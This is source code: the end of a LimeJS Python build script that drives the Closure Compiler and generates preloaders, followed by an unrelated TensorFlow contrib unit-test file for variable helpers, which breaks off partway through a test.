        call+=" -f --formatting=PRETTY_PRINT -f --source_map_format=V3 -f --create_source_map="+outname+'.map'
    else:
        call+=" -f --define='goog.DEBUG=false'"

    if options.use_strict:
        call+=" -f --language_in=ECMASCRIPT5_STRICT"

    if options.define:
        for i, opt in enumerate(options.define):
            call+=" -f --define='"+opt+"'"

    if options.output:
        call+=' --output_file="'+outname+'"'
        if not exists(os.path.dirname(outname)):
            os.makedirs(os.path.dirname(outname))

    errhandle = 0
    try:
        subprocess.check_call(call, shell=True);
    except subprocess.CalledProcessError:
        # handle error later
        errhandle = 1
        pass

    if options.map_file:
        map_filename = outname+'.map'
        map_file = open(map_filename, 'r+')

        # make source paths relative in map file
        data = json.load(map_file)
        # BUG FIX (Python 3): map() returns an iterator which json.dump
        # cannot serialize; materialize it as a list.
        data['sources'] = list(map(lambda p: os.path.relpath(p, os.path.dirname(map_filename)), data['sources']))
        map_file.close()
        map_file = open(map_filename, 'w')
        json.dump(data, map_file)
        map_file.close()

        # add path to map file
        out_file = open(outname, 'a')
        out_file.write('\n//@ sourceMappingURL=' + os.path.relpath(map_filename, os.path.dirname(outname)))
        out_file.close()

    if options.output and options.preload:
        name = os.path.basename(outname)[:-3]
        target = os.path.dirname(outname)
        source = os.path.join(basedir,'lime/templates/preloader')

        # copy preloader template files, renaming __name__ placeholders
        for root, dirs, files in os.walk(source):
            for fname in files:
                from_ = join(root, fname)
                to_ = from_.replace(source, target, 1)
                to_directory = split(to_)[0]
                to_ = to_.replace('__name__',name)
                if not exists(to_directory):
                    os.makedirs(to_directory)
                if not exists(to_):
                    copyfile(from_, to_)

        # substitute placeholders and refresh the manifest timestamp in place
        for root, dirs, files in os.walk(target):
            for fname in files:
                if exists(os.path.join(target,fname)):
                    for line in fileinput.FileInput(os.path.join(target,fname),inplace=1):
                        line = line.replace('{name}',name)
                        line = line.replace('{callback}',options.preload)
                        if fname == name+'.manifest':
                            line = re.sub(r'# Updated on:.*','# Updated on: '+datetime.now().strftime("%Y-%m-%d %H:%M:%S"),line)
                        print(line.rstrip())

    if errhandle == 1:
        exit(1)


def main():
    """The entrypoint for this script."""

    usage = """usage: %prog [command] [options]

Commands:
    init            Check lime dependecies and setup if needed
    update          Update Closure dependency file. Need to run every time
                    you change goog.provide() or goog.require()
    create [path/name]   Setup new project [name]
    gensoy [path]   Convert all *.soy files under path to *.soy.js files
    build [name]    Compile project to single Javascript file"""

    parser = optparse.OptionParser(usage)

    parser.add_option("-a", "--advanced", dest="advanced", action="store_true",
        help="Build uses ADVANCED_OPTIMIZATIONS mode (encouraged)")

    parser.add_option("-g", "--debug", dest="debug", action="store_true",
        help="Closure Compiler: longer names for symbols for debugging of the advanced optimizations.")

    parser.add_option('-e', '--externs', dest="externs_file", action='append',
        help="File with externs declarations.")

    parser.add_option("-o", "--output", dest="output", action="store", type="string",
        help="Output file for build result")

    parser.add_option("-m", "--map", dest="map_file", action="store_true",
        help="Build result sourcemap for debugging. Also turns on pretty print.")

    parser.add_option("-s", "--use-strict", dest="use_strict", action="store_true",
        help="Use EcmaScript5 strict mode.")

    parser.add_option("-p", "--preload", dest="preload", action="store", type="string",
        help="Generate preloader code with given callback as start point.")

    parser.add_option("-d", "--define", dest="define", action="append",
        help="Define custom variable accessible before build.")

    (options, args) = parser.parse_args()

    if not (len(args) == 2 or (len(args)==1 and ['init','update'].count(args[0])==1 )) :
        parser.error('incorrect number of arguments')

    checkDependencies()

    if args[0]=='init' or args[0]=='update':
        update()
    elif args[0]=='create':
        create(args[1])
    elif args[0]=='gensoy':
        genSoy(args[1])
    elif args[0]=='build':
        build(args[1],options)
    else:
        logging.error('No such command: %s',args[0])
        exit(1)


if __name__ == '__main__':
    main()
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""variables tests.

Exercises the tf.contrib.framework variable helpers: local/model variable
creation, global-step management, variable lookup by scope/suffix/name,
collection handling, device placement, and assign-from-values/checkpoint
initialization.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import os

import numpy as np
import tensorflow as tf


class LocalVariableTest(tf.test.TestCase):
  """Tests for tf.contrib.framework.local_variable and get_local_variables."""

  def test_local_variable(self):
    with self.test_session() as sess:
      self.assertEquals([], tf.local_variables())
      value0 = 42
      tf.contrib.framework.local_variable(value0)
      value1 = 43
      tf.contrib.framework.local_variable(value1)
      variables = tf.local_variables()
      self.assertEquals(2, len(variables))
      # Reading before initialization must fail.
      self.assertRaises(tf.OpError, sess.run, variables)
      tf.initialize_variables(variables).run()
      self.assertAllEqual(set([value0, value1]), set(sess.run(variables)))

  def testLocalVariableNameAndShape(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.local_variable([1, 1, 1, 1, 1], name='a')
        self.assertEquals(a.op.name, 'A/a')
        self.assertListEqual(a.get_shape().as_list(), [5])
        self.assertListEqual([a], tf.contrib.framework.get_local_variables())

  def testLocalVariableNotInAllVariables(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.local_variable(0)
        # Local variables live only in the LOCAL_VARIABLES collection.
        self.assertFalse(a in tf.all_variables())
        self.assertTrue(a in tf.local_variables())

  def testLocalVariableNotInVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.local_variable(0)
        self.assertFalse(a in tf.contrib.framework.get_variables_to_restore())
        self.assertTrue(a in tf.local_variables())

  def testGetVariablesDontReturnsTransients(self):
    with self.test_session():
      with tf.variable_scope('A'):
        tf.contrib.framework.local_variable(0)
      with tf.variable_scope('B'):
        tf.contrib.framework.local_variable(0)
      self.assertEquals([], tf.contrib.framework.get_variables('A'))
      self.assertEquals([], tf.contrib.framework.get_variables('B'))

  def testGetLocalVariablesReturnsTransients(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.local_variable(0)
      with tf.variable_scope('B'):
        b = tf.contrib.framework.local_variable(0)
      self.assertEquals([a], tf.contrib.framework.get_local_variables('A'))
      self.assertEquals([b], tf.contrib.framework.get_local_variables('B'))

  def testInitializedVariableValue(self):
    with self.test_session() as sess:
      a = tf.contrib.framework.local_variable([0, 0, 0, 0, 0], name='a')
      sess.run(tf.initialize_local_variables())
      self.assertAllEqual(a.eval(), [0]*5)


class GlobalStepTest(tf.test.TestCase):
  """Tests for create/get(_or_create)_global_step."""

  def _assert_global_step(self, global_step, expected_dtype=tf.int64):
    # A valid global step is a scalar integer named by GraphKeys.GLOBAL_STEP.
    self.assertEquals('%s:0' % tf.GraphKeys.GLOBAL_STEP, global_step.name)
    self.assertEquals(expected_dtype, global_step.dtype.base_dtype)
    self.assertEquals([], global_step.get_shape().as_list())

  def test_invalid_dtype(self):
    with tf.Graph().as_default() as g:
      self.assertEquals(None, tf.contrib.framework.get_global_step())
      # A float variable under the global-step name must be rejected.
      tf.Variable(
          0.0, trainable=False, dtype=tf.float32,
          name=tf.GraphKeys.GLOBAL_STEP)
      self.assertRaisesRegexp(
          TypeError, 'does not have integer type',
          tf.contrib.framework.get_global_step)
      self.assertRaisesRegexp(
          TypeError, 'does not have integer type',
          tf.contrib.framework.get_global_step, g)

  def test_invalid_shape(self):
    with tf.Graph().as_default() as g:
      self.assertEquals(None, tf.contrib.framework.get_global_step())
      # A non-scalar variable under the global-step name must be rejected.
      tf.Variable(
          [0], trainable=False, dtype=tf.int32,
          name=tf.GraphKeys.GLOBAL_STEP)
      self.assertRaisesRegexp(
          TypeError, 'not scalar',
          tf.contrib.framework.get_global_step)
      self.assertRaisesRegexp(
          TypeError, 'not scalar',
          tf.contrib.framework.get_global_step, g)

  def test_create_global_step(self):
    self.assertEquals(None, tf.contrib.framework.get_global_step())
    with tf.Graph().as_default() as g:
      global_step = tf.contrib.framework.create_global_step()
      self._assert_global_step(global_step)
      # Creating twice in the same graph is an error.
      self.assertRaisesRegexp(
          ValueError, 'already exists', tf.contrib.framework.create_global_step)
      self.assertRaisesRegexp(
          ValueError, 'already exists', tf.contrib.framework.create_global_step,
          g)
      # But a fresh graph gets its own global step.
      self._assert_global_step(
          tf.contrib.framework.create_global_step(tf.Graph()))

  def test_get_global_step(self):
    with tf.Graph().as_default() as g:
      self.assertEquals(None, tf.contrib.framework.get_global_step())
      tf.Variable(
          0, trainable=False, dtype=tf.int32,
          name=tf.GraphKeys.GLOBAL_STEP)
      self._assert_global_step(
          tf.contrib.framework.get_global_step(), expected_dtype=tf.int32)
      self._assert_global_step(
          tf.contrib.framework.get_global_step(g), expected_dtype=tf.int32)

  def test_get_or_create_global_step(self):
    with tf.Graph().as_default() as g:
      self.assertEquals(None, tf.contrib.framework.get_global_step())
      self._assert_global_step(
          tf.contrib.framework.get_or_create_global_step())
      self._assert_global_step(
          tf.contrib.framework.get_or_create_global_step(g))


class VariablesTest(tf.test.TestCase):
  """Tests for tf.contrib.framework.variable creation, lookup and placement."""

  def testCreateVariable(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        self.assertEquals(a.op.name, 'A/a')
        self.assertListEqual(a.get_shape().as_list(), [5])
        # Plain variables go to VARIABLES but not MODEL_VARIABLES or locals.
        self.assertTrue(a in tf.get_collection(tf.GraphKeys.VARIABLES))
        self.assertFalse(a in tf.get_collection(tf.GraphKeys.MODEL_VARIABLES))
        self.assertFalse(a in tf.local_variables())

  def testGetVariables(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.variable('a', [5])
      self.assertEquals([a, b], tf.contrib.framework.get_variables())
      self.assertEquals([a], tf.contrib.framework.get_variables('A'))
      self.assertEquals([b], tf.contrib.framework.get_variables('B'))

  def testGetVariablesSuffix(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
      with tf.variable_scope('A'):
        b = tf.contrib.framework.variable('b', [5])
      self.assertEquals([a], tf.contrib.framework.get_variables(suffix='a'))
      self.assertEquals([b], tf.contrib.framework.get_variables(suffix='b'))

  def testGetVariableWithSingleVar(self):
    with self.test_session():
      with tf.variable_scope('parent'):
        a = tf.contrib.framework.variable('child', [5])
      self.assertEquals(
          a, tf.contrib.framework.get_unique_variable('parent/child'))

  def testGetVariableWithDistractors(self):
    with self.test_session():
      with tf.variable_scope('parent'):
        a = tf.contrib.framework.variable('child', [5])
        with tf.variable_scope('child'):
          # Distractors living under the same name prefix.
          tf.contrib.framework.variable('grandchild1', [7])
          tf.contrib.framework.variable('grandchild2', [9])
      self.assertEquals(
          a, tf.contrib.framework.get_unique_variable('parent/child'))

  def testGetVariableThrowsExceptionWithNoMatch(self):
    var_name = 'cant_find_me'
    with self.test_session():
      with self.assertRaises(ValueError):
        tf.contrib.framework.get_unique_variable(var_name)

  def testGetThrowsExceptionWithChildrenButNoMatch(self):
    var_name = 'parent/child'
    with self.test_session():
      with tf.variable_scope(var_name):
        # Only children exist under the requested name -- no exact match.
        tf.contrib.framework.variable('grandchild1', [7])
        tf.contrib.framework.variable('grandchild2', [9])
      with self.assertRaises(ValueError):
        tf.contrib.framework.get_unique_variable(var_name)

  def testGetVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.variable('a', [5])
      self.assertEquals([a, b],
                        tf.contrib.framework.get_variables_to_restore())

  def testIncludeGetVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.variable('a', [5])
      self.assertEquals([a, b], tf.contrib.framework.get_variables())
      self.assertEquals([a],
                        tf.contrib.framework.get_variables_to_restore(['A']))

  def testExcludeGetVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.variable('a', [5])
      self.assertEquals([a, b], tf.contrib.framework.get_variables())
      self.assertEquals([a],
                        tf.contrib.framework.get_variables_to_restore(
                            exclude=['B']))

  def testWrongIncludeGetVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.variable('a', [5])
      self.assertEquals([a, b], tf.contrib.framework.get_variables())
      # 'a' matches no scope prefix, so nothing is returned.
      self.assertEquals([],
                        tf.contrib.framework.get_variables_to_restore(['a']))

  def testGetMixedVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        b = tf.contrib.framework.variable('b', [5])
      with tf.variable_scope('B'):
        c = tf.contrib.framework.variable('c', [5])
        d = tf.contrib.framework.variable('d', [5])
      self.assertEquals([a, b, c, d], tf.contrib.framework.get_variables())
      self.assertEquals([a, c],
                        tf.contrib.framework.get_variables_to_restore(
                            include=['A/a', 'B/c']))

  def testExcludeGetMixedVariablesToRestore(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        b = tf.contrib.framework.variable('b', [5])
      with tf.variable_scope('B'):
        c = tf.contrib.framework.variable('c', [5])
        d = tf.contrib.framework.variable('d', [5])
      self.assertEquals([a, b, c, d], tf.contrib.framework.get_variables())
      self.assertEquals([b, d],
                        tf.contrib.framework.get_variables_to_restore(
                            exclude=['A/a', 'B/c']))

  def testReuseVariable(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [])
      with tf.variable_scope('A', reuse=True):
        b = tf.contrib.framework.variable('a', [])
      # Reuse returns the same underlying variable, listed only once.
      self.assertEquals(a, b)
      self.assertListEqual([a], tf.contrib.framework.get_variables())

  def testVariableWithRegularizer(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [], regularizer=tf.nn.l2_loss)
      loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0]
      self.assertDeviceEqual(loss.device, a.device)

  def testVariableWithRegularizerColocate(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [], device='gpu:0',
                                          regularizer=tf.nn.l2_loss)
      # The regularization loss is colocated with its variable.
      loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0]
      self.assertDeviceEqual(loss.device, a.device)

  def testVariableWithDevice(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [], device='cpu:0')
        b = tf.contrib.framework.variable('b', [], device='cpu:1')
      self.assertDeviceEqual(a.device, 'cpu:0')
      self.assertDeviceEqual(b.device, 'cpu:1')

  def testVariableWithDeviceFromScope(self):
    with self.test_session():
      with tf.device('/cpu:0'):
        a = tf.contrib.framework.variable('a', [])
        # An explicit device argument overrides the surrounding scope.
        b = tf.contrib.framework.variable('b', [], device='cpu:1')
      self.assertDeviceEqual(a.device, 'cpu:0')
      self.assertDeviceEqual(b.device, 'cpu:1')

  def testVariableWithDeviceFunction(self):

    class DevFn(object):
      # Callable device chooser: assigns cpu:0, cpu:1, ... per invocation.

      def __init__(self):
        self.counter = -1

      def __call__(self, op):
        self.counter += 1
        return 'cpu:%d' % self.counter

    with self.test_session():
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          device=DevFn()):
        a = tf.contrib.framework.variable('a', [])
        b = tf.contrib.framework.variable('b', [])
        c = tf.contrib.framework.variable('c', [], device='cpu:12')
        d = tf.contrib.framework.variable('d', [])
        with tf.device('cpu:99'):
          e_init = tf.constant(12)
        e = tf.contrib.framework.variable('e', initializer=e_init)
      self.assertDeviceEqual(a.device, 'cpu:0')
      self.assertDeviceEqual(a.initial_value.device, 'cpu:0')
      self.assertDeviceEqual(b.device, 'cpu:1')
      self.assertDeviceEqual(b.initial_value.device, 'cpu:1')
      self.assertDeviceEqual(c.device, 'cpu:12')
      self.assertDeviceEqual(c.initial_value.device, 'cpu:12')
      self.assertDeviceEqual(d.device, 'cpu:2')
      self.assertDeviceEqual(d.initial_value.device, 'cpu:2')
      self.assertDeviceEqual(e.device, 'cpu:3')
      # e's initializer keeps the device it was created under.
      self.assertDeviceEqual(e.initial_value.device, 'cpu:99')

  def testVariableWithReplicaDeviceSetter(self):
    with self.test_session():
      with tf.device(tf.train.replica_device_setter(ps_tasks=2)):
        a = tf.contrib.framework.variable('a', [])
        b = tf.contrib.framework.variable('b', [])
        c = tf.contrib.framework.variable('c', [], device='cpu:12')
        d = tf.contrib.framework.variable('d', [])
        with tf.device('cpu:99'):
          e_init = tf.constant(12)
        e = tf.contrib.framework.variable('e', initializer=e_init)
      # The values below highlight how the replica_device_setter puts initial
      # values on the worker job, and how it merges explicit devices.
      self.assertDeviceEqual(a.device, '/job:ps/task:0/cpu:0')
      self.assertDeviceEqual(a.initial_value.device, a.device)
      self.assertDeviceEqual(b.device, '/job:ps/task:1/cpu:0')
      self.assertDeviceEqual(b.initial_value.device, b.device)
      self.assertDeviceEqual(c.device, '/job:ps/task:0/cpu:12')
      self.assertDeviceEqual(c.initial_value.device, c.device)
      self.assertDeviceEqual(d.device, '/job:ps/task:1/cpu:0')
      self.assertDeviceEqual(d.initial_value.device, d.device)
      self.assertDeviceEqual(e.device, '/job:ps/task:0/cpu:0')
      self.assertDeviceEqual(e.initial_value.device, '/job:worker/cpu:99')

  def testVariableWithVariableDeviceChooser(self):

    with tf.Graph().as_default():
      device_fn = tf.contrib.framework.VariableDeviceChooser(num_tasks=2)
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          device=device_fn):
        a = tf.contrib.framework.variable('a', [])
        b = tf.contrib.framework.variable('b', [])
        c = tf.contrib.framework.variable('c', [], device='cpu:12')
        d = tf.contrib.framework.variable('d', [])
        with tf.device('cpu:99'):
          e_init = tf.constant(12)
        e = tf.contrib.framework.variable('e', initializer=e_init)
      # The values below highlight how the VariableDeviceChooser puts initial
      # values on the same device as the variable job.
      self.assertDeviceEqual(a.device, '/job:ps/task:0/cpu:0')
      self.assertDeviceEqual(a.initial_value.device, a.device)
      self.assertDeviceEqual(b.device, '/job:ps/task:1/cpu:0')
      self.assertDeviceEqual(b.initial_value.device, b.device)
      self.assertDeviceEqual(c.device, '/cpu:12')
      self.assertDeviceEqual(c.initial_value.device, c.device)
      self.assertDeviceEqual(d.device, '/job:ps/task:0/cpu:0')
      self.assertDeviceEqual(d.initial_value.device, d.device)
      self.assertDeviceEqual(e.device, '/job:ps/task:1/cpu:0')
      self.assertDeviceEqual(e.initial_value.device, '/cpu:99')

  def testVariableGPUPlacement(self):

    with tf.Graph().as_default():
      device_fn = tf.contrib.framework.VariableDeviceChooser(device_type='GPU')
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          device=device_fn):
        a = tf.contrib.framework.variable('a', [])
        b = tf.contrib.framework.variable('b', [])
        c = tf.contrib.framework.variable('c', [], device='cpu:12')
        d = tf.contrib.framework.variable('d', [])
        with tf.device('cpu:99'):
          e_init = tf.constant(12)
        e = tf.contrib.framework.variable('e', initializer=e_init)
      # The values below highlight how the VariableDeviceChooser puts initial
      # values on the same device as the variable job.
      self.assertDeviceEqual(a.device, '/gpu:0')
      self.assertDeviceEqual(a.initial_value.device, a.device)
      self.assertDeviceEqual(b.device, '/gpu:0')
      self.assertDeviceEqual(b.initial_value.device, b.device)
      self.assertDeviceEqual(c.device, '/cpu:12')
      self.assertDeviceEqual(c.initial_value.device, c.device)
      self.assertDeviceEqual(d.device, '/gpu:0')
      self.assertDeviceEqual(d.initial_value.device, d.device)
      self.assertDeviceEqual(e.device, '/gpu:0')
      self.assertDeviceEqual(e.initial_value.device, '/cpu:99')


class ModelVariablesTest(tf.test.TestCase):
  """Tests for tf.contrib.framework.model_variable and get_model_variables."""

  def testNameAndShape(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.model_variable('a', [5])
        self.assertEquals(a.op.name, 'A/a')
        self.assertListEqual(a.get_shape().as_list(), [5])
        self.assertListEqual([a], tf.contrib.framework.get_model_variables('A'))

  def testNotInLocalVariables(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.model_variable('a', [5])
        # Model variables are global (restorable), never local.
        self.assertTrue(a in tf.all_variables())
        self.assertTrue(a in tf.get_collection(tf.GraphKeys.MODEL_VARIABLES))
        self.assertFalse(a in tf.local_variables())

  def testGetVariablesReturns(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.model_variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.model_variable('a', [5])
      self.assertEquals([a], tf.contrib.framework.get_variables('A'))
      self.assertEquals([b], tf.contrib.framework.get_variables('B'))

  def testGetModelVariables(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.model_variable('a', [5])
      with tf.variable_scope('B'):
        b = tf.contrib.framework.model_variable('a', [5])
      self.assertEquals([a], tf.contrib.framework.get_model_variables('A'))
      self.assertEquals([b], tf.contrib.framework.get_model_variables('B'))

  def testGetLocalVariables(self):
    with self.test_session():
      with tf.variable_scope('A'):
        _ = tf.contrib.framework.model_variable('a', [5])
      with tf.variable_scope('B'):
        _ = tf.contrib.framework.model_variable('a', [5])
      # Model variables never show up as local variables.
      self.assertEquals([], tf.contrib.framework.get_local_variables('A'))
      self.assertEquals([], tf.contrib.framework.get_local_variables('B'))

  def testInitializedVariableValue(self):
    with self.test_session() as sess:
      a = tf.contrib.framework.model_variable(
          'a', [5], initializer=tf.ones_initializer)
      sess.run(tf.initialize_all_variables())
      self.assertAllEqual(a.eval(), [1]*5)

  def testDeviceFn(self):

    class DevFn(object):
      # Callable device chooser: assigns /cpu:0, /cpu:1, ... per invocation.

      def __init__(self):
        self.counter = -1

      def __call__(self, op):
        self.counter += 1
        return '/cpu:%d' % self.counter

    with tf.Graph().as_default():
      with tf.contrib.framework.arg_scope([tf.contrib.framework.model_variable],
                                          device=DevFn()):
        a = tf.contrib.framework.model_variable('a', [5])
        b = tf.contrib.framework.model_variable('b', [20])
        self.assertDeviceEqual(a.device, '/cpu:0')
        self.assertDeviceEqual(a.initial_value.device, '/cpu:0')
        self.assertDeviceEqual(b.device, '/cpu:1')
        self.assertDeviceEqual(b.initial_value.device, '/cpu:1')

  def testVariableWithVariableDeviceChooser(self):

    with tf.Graph().as_default():
      device_fn = tf.contrib.framework.VariableDeviceChooser()
      with tf.contrib.framework.arg_scope([tf.contrib.framework.model_variable],
                                          device=device_fn):
        a = tf.contrib.framework.model_variable('a', [5])
        b = tf.contrib.framework.model_variable('b', [20])
        self.assertDeviceEqual(a.device, 'cpu:0')
        self.assertDeviceEqual(a.initial_value.device, a.device)
        self.assertDeviceEqual(b.device, 'cpu:0')
        self.assertDeviceEqual(b.initial_value.device, b.device)


class GetVariablesCollections(tf.test.TestCase):
  """Tests that the `collections` argument routes variables correctly."""

  def testVariableCollection(self):
    with self.test_session():
      a = tf.contrib.framework.variable('a', [], collections='A')
      b = tf.contrib.framework.variable('b', [], collections='B')
      self.assertEquals(a, tf.get_collection('A')[0])
      self.assertEquals(b, tf.get_collection('B')[0])

  def testVariableCollections(self):
    with self.test_session():
      a = tf.contrib.framework.variable('a', [], collections=['A', 'C'])
      b = tf.contrib.framework.variable('b', [], collections=['B', 'C'])
      self.assertEquals(a, tf.get_collection('A')[0])
      self.assertEquals(b, tf.get_collection('B')[0])
      # Both variables share collection 'C'.
      self.assertListEqual([a, b], tf.get_collection('C'))

  def testVariableCollectionsWithArgScope(self):
    with self.test_session():
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          collections='A'):
        a = tf.contrib.framework.variable('a', [])
        b = tf.contrib.framework.variable('b', [])
      self.assertListEqual([a, b], tf.get_collection('A'))

  def testVariableCollectionsWithArgScopeNested(self):
    with self.test_session():
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          collections='A'):
        a = tf.contrib.framework.variable('a', [])
        with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                            collections='B'):
          # The inner arg_scope overrides the outer collections setting.
          b = tf.contrib.framework.variable('b', [])
      self.assertEquals(a, tf.get_collection('A')[0])
      self.assertEquals(b, tf.get_collection('B')[0])

  def testVariableCollectionsWithArgScopeNonNested(self):
    with self.test_session():
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          collections='A'):
        a = tf.contrib.framework.variable('a', [])
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          collections='B'):
        b = tf.contrib.framework.variable('b', [])
      # Created outside both scopes: lands in neither collection.
      tf.contrib.framework.variable('c', [])
      self.assertListEqual([a], tf.get_collection('A'))
      self.assertListEqual([b], tf.get_collection('B'))

  def testVariableRestoreWithArgScopeNested(self):
    with self.test_session():
      a = tf.contrib.framework.variable('a', [])
      with tf.contrib.framework.arg_scope([tf.contrib.framework.variable],
                                          trainable=False,
                                          collections=['A', 'B']):
        b = tf.contrib.framework.variable('b', [])
      c = tf.contrib.framework.variable('c', [], trainable=False)
      # b went to custom collections only, so it is not restorable.
      self.assertEquals([a, c],
                        tf.contrib.framework.get_variables_to_restore())
      self.assertEquals([a], tf.trainable_variables())
      self.assertEquals([b], tf.get_collection('A'))
      self.assertEquals([b], tf.get_collection('B'))


class GetVariablesBySuffixTest(tf.test.TestCase):
  """Tests for get_variables_by_suffix lookup semantics."""

  def testGetVariableGivenNameScoped(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        b = tf.contrib.framework.variable('b', [5])
        self.assertEquals([a],
                          tf.contrib.framework.get_variables_by_suffix('a'))
        self.assertEquals([b],
                          tf.contrib.framework.get_variables_by_suffix('b'))

  def testGetVariableWithScope(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        fooa = tf.contrib.framework.variable('fooa', [5])
      with tf.variable_scope('B'):
        a2 = tf.contrib.framework.variable('a', [5])
      # Suffix 'a' matches any name ending in 'a' (including 'fooa').
      matched_variables = tf.contrib.framework.get_variables_by_suffix('a')
      self.assertEquals([a, fooa, a2], matched_variables)
      # '/a' anchors the match at a path-component boundary.
      matched_variables = tf.contrib.framework.get_variables_by_suffix('/a')
      self.assertEquals([a, a2], matched_variables)
      matched_variables = tf.contrib.framework.get_variables_by_suffix(
          'a', scope='A')
      self.assertEquals([a, fooa], matched_variables)

  def testGetVariableWithoutScope(self):
    with self.test_session():
      a = tf.contrib.framework.variable('a', [5])
      fooa = tf.contrib.framework.variable('fooa', [5])
      b_a = tf.contrib.framework.variable('B/a', [5])
      matched_variables = tf.contrib.framework.get_variables_by_suffix('a')
      self.assertEquals([a, fooa, b_a], matched_variables)
      matched_variables = tf.contrib.framework.get_variables_by_suffix('fooa')
      self.assertEquals([fooa], matched_variables)


class GetVariablesByNameTest(tf.test.TestCase):
  """Tests for get_variables_by_name exact-component lookup semantics."""

  def testGetVariableGivenNameScoped(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        b = tf.contrib.framework.variable('b', [5])
        self.assertEquals([a], tf.contrib.framework.get_variables_by_name('a'))
        self.assertEquals([b], tf.contrib.framework.get_variables_by_name('b'))

  def testGetVariableWithScope(self):
    with self.test_session():
      with tf.variable_scope('A'):
        a = tf.contrib.framework.variable('a', [5])
        fooa = tf.contrib.framework.variable('fooa', [5])
      with tf.variable_scope('B'):
        a2 = tf.contrib.framework.variable('a', [5])
      # Unlike suffix lookup, by-name requires the whole final component.
      matched_variables = tf.contrib.framework.get_variables_by_name('a')
      self.assertEquals([a, a2], matched_variables)
      matched_variables = tf.contrib.framework.get_variables_by_name('fooa')
      self.assertEquals([fooa], matched_variables)
      matched_variables = tf.contrib.framework.get_variables_by_name('/a')
      self.assertEquals([], matched_variables)
      matched_variables = tf.contrib.framework.get_variables_by_name('a',
                                                                     scope='A')
      self.assertEquals([a], matched_variables)

  def testGetVariableWithoutScope(self):
    with self.test_session():
      a = tf.contrib.framework.variable('a', [5])
      fooa = tf.contrib.framework.variable('fooa', [5])
      b_a = tf.contrib.framework.variable('B/a', [5])
      matched_variables = tf.contrib.framework.get_variables_by_name('a')
      self.assertEquals([a, b_a], matched_variables)
      matched_variables = tf.contrib.framework.get_variables_by_name('fooa')
      self.assertEquals([fooa], matched_variables)


class AssignFromValuesTest(tf.test.TestCase):
  """Tests for assign_from_values (returns an assign op plus a feed dict)."""

  def testNoScopes(self):
    init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1))
    init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2))

    with self.test_session() as sess:
      initializer = tf.truncated_normal_initializer(stddev=.1)
      var0 = tf.contrib.framework.variables.variable(
          'my_var0', shape=[1, 3, 1], initializer=initializer)
      var1 = tf.contrib.framework.variables.variable(
          'my_var1', shape=[2, 1, 2], initializer=initializer)

      var_names_to_values = {'my_var0': init_value0, 'my_var1': init_value1}
      assign_op, feed_dict = tf.contrib.framework.variables.assign_from_values(
          var_names_to_values)

      # Initialize the variables.
      sess.run(tf.initialize_all_variables())

      # Perform the assignment.
      sess.run(assign_op, feed_dict)

      # Request and test the variable values:
      var0, var1 = sess.run([var0, var1])
      self.assertAllEqual(init_value0, var0)
